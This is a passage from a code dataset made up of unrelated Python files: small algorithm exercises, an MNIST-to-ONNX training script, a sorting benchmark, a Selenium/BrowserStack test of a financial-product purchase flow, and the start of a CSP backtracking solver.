'there', 'thereafter', 'thereby', \n'therefore', 'therein', 'thereupon', 'these', 'they', 'thickv', 'thin', 'third',\n'this', 'those', 'though', 'three', 'through', 'throughout', 'thru', 'thus', \n'to', 'together', 'too', 'top', 'toward', 'towards', 'twelve', 'twenty', 'two', \n'un', 'under', 'until', 'up', 'upon', 'us', 'very', 'via', 'was', 'we', 'well', \n'were', 'what', 'whatever', 'when', 'whence', 'whenever', 'where', 'whereafter',\n'whereas', 'whereby', 'wherein', 'whereupon', 'wherever', 'whether', 'which', \n'while', 'whither', 'who', 'whoever', 'whole', 'whom', 'whose', 'why', 'will', \n'with', 'within', 'without', 'would', 
'yet', 'you', 'your', 'yours', 'yourself',\n'yourselves', 'the'])\n\nv=time.clock()\ni=Index() \ni.construct(\"t.pdf\")\nprint(time.clock()-v)\nprint(\"Enter word to be searched!\")\nword = input().lower()\nv=time.clock()\ndisplay(i.search(word))\nprint(time.clock()-v)","repo_name":"Tilak-Shenoy/Encyclopedia-Appendix","sub_path":"invertedindex.py","file_name":"invertedindex.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20259015666","text":"# Anton and Danik\n# https://codeforces.com/contest/734/problem/A\n#\n# Author: eloyhz\n# Date: Aug/25/2020\n\n\nif __name__ == '__main__':\n\tn = int(input())\n\tgames = input()\n\tanton = 0\n\tdanik = 0\n\tfor player in games:\n\t\tif player == 'A':\n\t\t\tanton += 1\n\t\telse:\n\t\t\tdanik += 1\n\tif anton > danik:\n\t\tprint('Anton')\n\telif danik > anton:\n\t\tprint('Danik')\n\telse:\n\t\tprint('Friendship')\n\n","repo_name":"eloyhz/competitive-programming","sub_path":"codeforces/training/CF734-D2-A.py","file_name":"CF734-D2-A.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14674903850","text":"from sklearn.datasets import fetch_openml\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom skl2onnx import convert_sklearn\nfrom skl2onnx.common.data_types import FloatTensorType\n\n# データの準備\nx, y = fetch_openml(\"mnist_784\", version=1, return_X_y=True, as_frame=False)\nprint(\"mnist comp\")\n\nx = x[:700]\ny = y[:700]\n\n# データの分割\nx_train, x_test, y_train, y_test = train_test_split(\n x, y, test_size=0.2, random_state=123\n)\n\n# 学習\nmodel = LogisticRegression(max_iter=1000)\nmodel.fit(x_train, y_train)\n\n# 精度確認\ny_pred = model.predict(x_test)\naccuracy = accuracy_score(y_test, y_pred)\nprint(f\"accuracy: {accuracy}\")\n\n# モデルファイル名の定義\nmodel_file = \"model.onnx\"\n\n# 入力データの形式を指定(mnistは28*28=768のデータである)\ninital_types = [(\"float_input\", FloatTensorType([None, 28*28]))]\n\n# モデルを変換する処理(optionで出力結果の形式を指定している)\nonnx = convert_sklearn(model, initial_types=inital_types, options={\"zipmap\": False})\n\nwith open(model_file, \"wb\") as f:\n f.write(onnx.SerializeToString())\n \nprint(f\"{model_file} exported\")","repo_name":"wtaru/python-web-app-freehand","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25058527055","text":"def Ispalindrome(str1):\n \n if str1 == '':\n return False\n slen = len(str1)//2+1\n \n for idx in range (slen):\n if str1[idx] != str1[-1-idx]:\n return False\n \n return True\n \ndef solution(s):\n N = len(s)\n Max = 0\n for lt in range (N):\n for rt in range (lt,N+1):\n if Ispalindrome(s[lt:rt]) and Max < len(s[lt:rt]):\n Max = len(s[lt:rt])\n return(Max)\n \n\n\n\nsolution(\"abcdcba\") ## 7\n","repo_name":"aver1001/github-practice","sub_path":"programmers/Level 3/가장 긴 팰린드롬/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27833286328","text":"import time\nimport random\n#%matplotlib inline\nimport matplotlib.pyplot as plt\n\ndef random_list(number):\n figure_list = []\n for n in range(number):\n value = random.randint(0, maxvalue)\n 
figure_list.append(value)\n return figure_list\n \ndef insertion_sort(a):\n for j in range(1, len(a)):\n key = a[j]\n k = j - 1\n while k >= 0 and a[k] > key:\n a[k + 1] = a[k]\n k = k - 1\n a[k + 1] = key\n\ndef mergesort(a,p,r):\n if p < r:\n q = (p+r) // 2\n mergesort(a,p,q)\n mergesort(a, q+1,r)\n\n n1 = q-p+1\n n2 = r-q\n L=[]\n R=[]\n for i in range(0,n1):\n L.append(a[p+i])\n for j in range(0,n2):\n R.append(a[q+j+1])\n L.append(1000000)\n R.append(1000000)\n i = 0\n j = 0\n for k in range(p, r+1):\n if L[i] <= R[j]:\n a[k] = L[i]\n i += 1\n else:\n a[k] = R[j]\n j += 1\n\nmaxvalue = 999999\nx = [500, 1000, 2000, 5000, 10000, 15000]\ny1 = []\ny2 = []\nfor figure in x:\n a = random_list(figure)\n start_time = time.process_time()\n insertion_sort(a)\n end_time = time.process_time()\n start_time2 = time.process_time()\n mergesort(a,0,len(a)-1)\n end_time2 = time.process_time()\n y1.append(end_time-start_time)\n y2.append(end_time2-start_time2)\n\nplt.title(\"Time\")\nplt.ylabel(\"Time[s]\")\nplt.xlabel(\"Number of data\")\nplt.plot(x, y1, marker=\"o\", label =\"insertion_sort\")\nplt.plot(x, y2, marker=\"x\", label=\"mergesort\")\nplt.legend()\nplt.show()","repo_name":"2basaa/python","sub_path":".vscode/algorithm_kadai/kadai5-2.py","file_name":"kadai5-2.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34682343685","text":"import os, sys, json\r\n\r\nparentddir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))\r\nprint(\"Current Directory\",parentddir)\r\n\r\npov_automation= os.path.dirname(parentddir)\r\nprint(pov_automation)\r\ncommon_direc_path = os.path.join(pov_automation, 'common')\r\nprint(common_direc_path)\r\nhelpers_direc_path = os.path.join(pov_automation, 'pyscripts/helpers')\r\nprint(helpers_direc_path)\r\n\r\nfrom selenium import webdriver\r\nimport sys\r\nsys.path.insert(0, common_direc_path)\r\nsys.path.insert(0, helpers_direc_path)\r\nimport common_call\r\nimport functional_common_call\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nfrom browserstack.local import Local\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import 
NoSuchElementException\r\n\r\n\r\nlogin_element_sheet,mfa_element_sheet,Global_Search_element_sheet,Member_Search_element_sheet,User_Search_element_sheet,adhoc_adviser_charge_element_sheet,manage_investment_income_element_sheet,equity_trading_element_sheet,viewquote_element_sheet,Search_element_sheet,Quotes_applications_element_sheet=common_call.get_element_sheet()\r\n\r\njira_id,Username,Password,name,env,device,platform,user_type=common_call.auto_fun('val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page')\r\nBROWSERSTACK_USERNAME,BROWSERSTACK_ACCESS_KEY,caps,web_address,op_filename,input_file,output_file=common_call.fun(platform,device,env,name,jira_id,user_type)\r\n\r\n\r\n#------------------------------------------------------#\r\n# THE TEST TO BE RUN PARALLELY GOES HERE\r\ndriver = webdriver.Remote(command_executor='https://%s:%s@hub.browserstack.com/wd/hub' % (BROWSERSTACK_USERNAME, BROWSERSTACK_ACCESS_KEY),desired_capabilities=caps)\r\n#common_call.connect_BS_hub(BROWSERSTACK_USERNAME,BROWSERSTACK_ACCESS_KEY,caps)\r\n\r\n\r\nfunctional_common_call.maximize_driver_window(driver)\r\ninput_df= pd.read_csv(input_file+\"val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page_input.csv\",encoding='cp1252')\r\nprint(input_df)\r\n\r\ndef val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page():\r\n\tdriver.implicitly_wait(10)\r\n\tsearch_result=[]\r\n\tdriver.maximize_window()\r\n\r\n\t#Product Select (SIPP Drawdown Transfer )\r\n\r\n\t#Click on the search button\r\n\tSearchbutton=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[118,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Searchbutton);\r\n\tcommon_call.highlight_element(Searchbutton, 2, 5)\r\n\tSearchbutton.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Enter values in the input bar\r\n\tInput=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[119,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Input);\r\n\tcommon_call.highlight_element(Input, 2, 5)\r\n\tInput.click()\r\n\tInput.send_keys('20486569')\r\n\ttime.sleep(3)\r\n\r\n\t#Click on the submit button\r\n\tSubmit=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[120,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Submit);\r\n\tcommon_call.highlight_element(Submit, 2, 5)\r\n\tSubmit.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Click on the client ID\r\n\tClientname=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[139,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Clientname);\r\n\tcommon_call.highlight_element(Clientname, 2, 5)\r\n\tprint(Clientname.text)\r\n\tClientname.click()\r\n\ttime.sleep(20)\r\n\r\n\t#Buy product button click\r\n\tBuyproduct=driver.find_element(by=By.LINK_TEXT, value=('Buy product'))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Buyproduct);\r\n\tcommon_call.highlight_element(Buyproduct, 2, 5)\r\n\tprint(Buyproduct.text)\r\n\tBuyproduct.click()\r\n\ttime.sleep(3)\r\n\r\n\t#AOR radio Button Select\r\n\tdriver.implicitly_wait(30)\r\n\tRadio_Button=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[22,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Radio_Button);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest'):\r\n\tcommon_call.highlight_element(Radio_Button, 2, 5)\r\n\tRadio_Button.click()\r\n\r\n\r\n\t#Click Start 
Button\r\n\tStart_Button=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[24,'accessbility_id']))\r\n\tcommon_call.highlight_element(Start_Button, 2, 5)\r\n\ttime.sleep(5)\r\n\tStart_Button.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Uk resident yes button\r\n\tresidentradiobutton =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[125,'accessbility_id']))\r\n\tresidentradiobutton.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Adviser button click\r\n\tadviseradiobutton =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[83,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", adviseradiobutton);\r\n\tcommon_call.highlight_element(adviseradiobutton, 2, 5)\r\n\ttime.sleep(3)\r\n\tadviseradiobutton.click()\r\n\ttime.sleep(3)\r\n\r\n\ttime.sleep(3)\r\n\t#Product Select\r\n\tproductadiobutton =driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[127,'accessbility_id']))\r\n\tfor product in productadiobutton:\r\n\t\tprint(product.text)\r\n\r\n\ttime.sleep(9)\r\n\r\n\tproductadiobutton =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[31,'accessbility_id']))\r\n\ttime.sleep(5)\r\n\t#if(device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(productadiobutton, 2, 5)\r\n\tprint(productadiobutton.text)\r\n\tproductadiobutton.click()\r\n\r\n\ttime.sleep(9)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#User Info\r\n\tUserInfo=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[39,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(UserInfo, 2, 5)\r\n\tprint(UserInfo.text)\r\n\r\n\t#HeDer Money In And Out\r\n\tHeardr=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[40,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Heardr, 2, 5)\r\n\tprint(Heardr.text)\r\n\r\n\t#No Button\r\n\tNo=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[30,'accessbility_id']))\r\n\tfor nobutton in No:\r\n\t\tif nobutton.text=='No':\r\n\t\t\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\t\t\tcommon_call.highlight_element(nobutton, 2, 5)\r\n\t\tprint(nobutton.text)\r\n\t\tnobutton.click()\r\n\r\n\ttime.sleep(5)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Next_button, 2, 
5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\tDDERROR=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[43,'accessbility_id']))\r\n\tprint(DDERROR.text)\r\n\r\n\r\n\t#Drawdown Arrangements Yes\r\n\r\n\tYes=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[73,'accessbility_id']))\r\n\tfor yesbutton in Yes:\r\n\t\tif yesbutton.text=='Yes':\r\n\t\t\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\t\t\tcommon_call.highlight_element(yesbutton, 2, 5)\r\n\t\t\tprint(yesbutton.text)\r\n\t\t\tyesbutton.click()\r\n\ttime.sleep(5)\r\n\r\n\t#Add tranche\r\n\tAddtranche=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[76,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Addtranche, 2, 5)\r\n\ttime.sleep(5)\r\n\tprint(Addtranche.text)\r\n\tAddtranche.click()\r\n\r\n\tAddtrancheinput=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[77,'accessbility_id']))\r\n\tAddtrancheinput.click()\r\n\tAddtrancheinput.send_keys(\"1111\")\r\n\r\n\t#income selection\r\n\tNo=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[52,'accessbility_id']))\r\n\tfor Nobutton in No:\r\n\t\tif Nobutton.text=='No':\r\n\t\t\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\t\t\tcommon_call.highlight_element(Nobutton, 2, 5)\r\n\t\t\tprint(Nobutton.text)\r\n\t\t\tNobutton.click()\r\n\ttime.sleep(5)\r\n\tSave=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[85,'accessbility_id']))\r\n\tSave.click()\r\n\r\n\t#Enter value to product refrence\r\n\r\n\tProductrefrence=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[49,'accessbility_id']))\r\n\tProductrefrence.click()\r\n\tProductrefrence.send_keys('Asish')\r\n\r\n\t#Transfer Provider\r\n\tAddTransfer=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[63,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\",AddTransfer)\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(AddTransfer, 2, 5)\r\n\tprint(AddTransfer.text)\r\n\tAddTransfer.click()\r\n\r\n\t#Transfer provider Box\r\n\tBox=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[74,'accessbility_id']))\r\n\tBox.send_keys('w')\r\n\r\n\tTransferprovider_dropdown=driver.find_elements(by=By.XPATH, value=(Search_element_sheet.loc[75,'accessbility_id']))\r\n\r\n\tfor TP in Transferprovider_dropdown:\r\n\t\tcommon_call.highlight_element(TP, 2, 5)\r\n\t\tprint(TP.text)\r\n\t\t#search_result.append(TP.text)\r\n\t\tTP.click()\r\n\t\tbreak\r\n\t\ttime.sleep(5)\r\n\r\n\tSave=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[86,'accessbility_id']))\r\n\tSave.click()\r\n\ttime.sleep(5)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#Investment option 
page\r\n\tSelectplatform=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[87,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Selectplatform);\r\n\tcommon_call.highlight_element(Selectplatform, 2, 5)\r\n\ttime.sleep(7)\r\n\tprint(Selectplatform.text)\r\n\tSelectplatform.click()\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Percentage allocation\r\n\tAllocate_percentage_asset = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[109,'accessbility_id']))\r\n\tAllocate_percentage_asset.clear()\r\n\tAllocate_percentage_asset.send_keys('100')\r\n\ttime.sleep(5)\r\n\r\n\tRebalancingOption = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[93,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", RebalancingOption);\r\n\ttime.sleep(15)\r\n\tprint(RebalancingOption.text)\r\n\tRebalancingOption.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#charges heading\r\n\theading1 =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[134,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", heading1);\r\n\tcommon_call.highlight_element(heading1, 2, 5)\r\n\tprint(heading1.text)\r\n\ttime.sleep(7)\r\n\r\n\t#charges page error\r\n\tchargeserror=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[148,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", chargeserror);\r\n\tcommon_call.highlight_element(chargeserror, 2, 5)\r\n\tprint(chargeserror.text)\r\n\ttime.sleep(3)\r\n\r\n\t#charges page check box selection\r\n\tchargecheckbox =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[96,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", chargecheckbox);\r\n\tcommon_call.highlight_element(chargecheckbox, 2, 5)\r\n\tprint(chargecheckbox.text)\r\n\tchargecheckbox.click()\r\n\ttime.sleep(3)\r\n\r\n\t#charges page check box selection\r\n\tchargetype =driver.find_element(by=By.XPATH, 
value=(Search_element_sheet.loc[97,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", chargetype);\r\n\tcommon_call.highlight_element(chargetype, 2, 5)\r\n\tprint(chargetype.text)\r\n\tchargetype.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Enter percentage value\r\n\tpercantage=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[98,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", percantage);\r\n\tcommon_call.highlight_element(percantage, 2, 5)\r\n\tpercantage.clear()\r\n\tpercantage.send_keys('4')\r\n\ttime.sleep(3)\r\n\r\n\r\n\t#ongoiing adviser charge yes radio button selection\r\n\tOngoingadviser = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[94,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Ongoingadviser, 2, 5)\r\n\tprint(Ongoingadviser.text)\r\n\tOngoingadviser.click()\r\n\r\n\t#charge type\r\n\tChargetype = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[95,'accessbility_id']))\r\n\t#driver.execute_script(\"arguments[0].scrollIntoView()\", Chargetype);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Chargetype, 2, 5)\r\n\tprint(Chargetype.text)\r\n\tChargetype.click()\r\n\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#Enter percentage value\r\n\tpercantage1=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[99,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", percantage1);\r\n\tcommon_call.highlight_element(percantage1, 2, 5)\r\n\tpercantage1.clear()\r\n\tpercantage1.send_keys('2')\r\n\ttime.sleep(3)\r\n\r\n\t#Calculating charges by percentage of product value CTA\r\n\tCTA= driver.find_element(by=By.PARTIAL_LINK_TEXT, value=(\"Calculating charges \"))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", CTA);\r\n\tprint(CTA.text)\r\n\tCTA.click()\r\n\r\n\ttime.sleep(2)\r\n\t#Modal Calculation CTA\r\n\tcalculationcta = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[91,'accessbility_id']))\r\n\tprint(calculationcta.text)\r\n\tcalculationcta.click()\r\n\r\n\tClose= driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[55,'accessbility_id']))\r\n\tClose.click()\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Save and Exit Button Click\r\n\tApply =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[150,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Apply);\r\n\tcommon_call.highlight_element(Apply, 2, 5)\r\n\tprint(Apply.text)\r\n\r\n\t# Personal Illustration\r\n\tWebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH,Search_element_sheet.loc[149, 'accessbility_id'])))\r\n\tIllustration2 =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[149,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Illustration2);\r\n\tcommon_call.highlight_element(Illustration2, 2, 
5)\r\n\tprint(Illustration2.text)\r\n\tsearch_result.append(Illustration2.text)\r\n\tdriver.implicitly_wait(20)\r\n\tIllustration2.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#Exit Button Click\r\n\tExit =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[35,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Exit);\r\n\tcommon_call.highlight_element(Exit, 2, 5)\r\n\tprint(Exit.text)\r\n\tdriver.implicitly_wait(20)\r\n\tExit.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Save and Exit Button Click\r\n\tSaveExit =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[46,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", SaveExit);\r\n\tcommon_call.highlight_element(Exit, 2, 5)\r\n\tprint(SaveExit.text)\r\n\tdriver.implicitly_wait(20)\r\n\tSaveExit.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\treturn search_result\r\n\r\nfunctional_common_call.login_quick(Username,Password,driver,web_address)\r\nsearch_result = val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page()\r\n\r\nsession_id=common_call.get_session_id(driver)\r\nprint(session_id)\r\ntime.sleep(10)\r\nactual_result_list=search_result\r\noutput_df=common_call.create_output(input_df,actual_result_list,session_id,BROWSERSTACK_USERNAME,BROWSERSTACK_ACCESS_KEY,driver)\r\nprint(output_df)\r\noutput_df.to_csv(output_file+op_filename+\"_output.csv\",index = False)\r\n\r\ndriver.quit()\r\ncommon_call.stop_local()","repo_name":"asish143/Python_Selenium","sub_path":"val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page.py","file_name":"val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page.py","file_ext":"py","file_size_in_byte":19000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9416610150","text":"'''\nCreated on Apr 11, 2020\n\n@author1: leyu_lin(Jack)\n@author2: Parth_Thummar\n\nbacktracking search\n'''\nfrom csp_lib.backtrack_util import (first_unassigned_variable,\n unordered_domain_values,\n no_inference)\n\n\ndef backtracking_search(csp,\n select_unassigned_variable=first_unassigned_variable,\n order_domain_values=unordered_domain_values,\n inference=no_inference):\n \"\"\"backtracking_search\n Given a constraint satisfaction problem (CSP),\n a function handle for selecting variables, \n a function handle for selecting elements of a domain,\n and a set of inferences, solve the CSP using backtrack search\n \"\"\"\n\n # See Figure 6.5] of your book for details\n\n def backtrack(assignment):\n \"\"\"Attempt to backtrack search with current assignment\n Returns None if there is no solution. 
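        (Editor's aside, hedged: for illustration only, a self-contained sketch
        of the same recursive skeleton with hypothetical names, independent of
        the csp_lib API used below:

            def solve(assignment, variables, domains, consistent):
                if len(assignment) == len(variables):
                    return assignment
                var = next(v for v in variables if v not in assignment)
                for val in domains[var]:
                    if consistent(var, val, assignment):
                        assignment[var] = val
                        result = solve(assignment, variables, domains, consistent)
                        if result is not None:
                            return result
                        del assignment[var]
                return None
        )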
